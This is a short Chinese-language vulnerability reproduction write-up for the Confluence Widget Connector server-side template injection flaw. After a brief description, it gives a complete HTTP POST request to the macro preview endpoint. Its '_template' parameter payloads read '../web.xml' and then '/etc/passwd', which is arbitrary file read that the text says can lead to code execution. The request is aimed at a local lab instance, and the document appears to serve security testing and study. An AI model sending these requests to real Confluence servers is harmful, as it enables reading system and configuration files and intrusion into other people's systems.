Confluence
Atlassian Confluence(简称Confluence)是一个专业的wiki(多人协作的写作系统)程序。它是一个知识管理的工具,通过它可以实现团队成员之间的协作和知识共享。
思路
Confluence Server 与 Confluence Data Center 中的 Widget Connector 存在服务端模板注入漏洞,攻击者构造特定请求可远程遍历服务器任意文件,进而可以包含恶意文件来执行代码。
漏洞复现
点击Get an evaluation license认证邮箱
复制Key
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 176
{
"contentId":"786458","macro":{
"name":"widget","body":"","params":{
"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}
发送成功后再尝试修改 _template 进行任意文件读取
{
"contentId":"786458","macro":{
"name":"widget","body":"","params":{
"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"file:///etc/passwd"}}}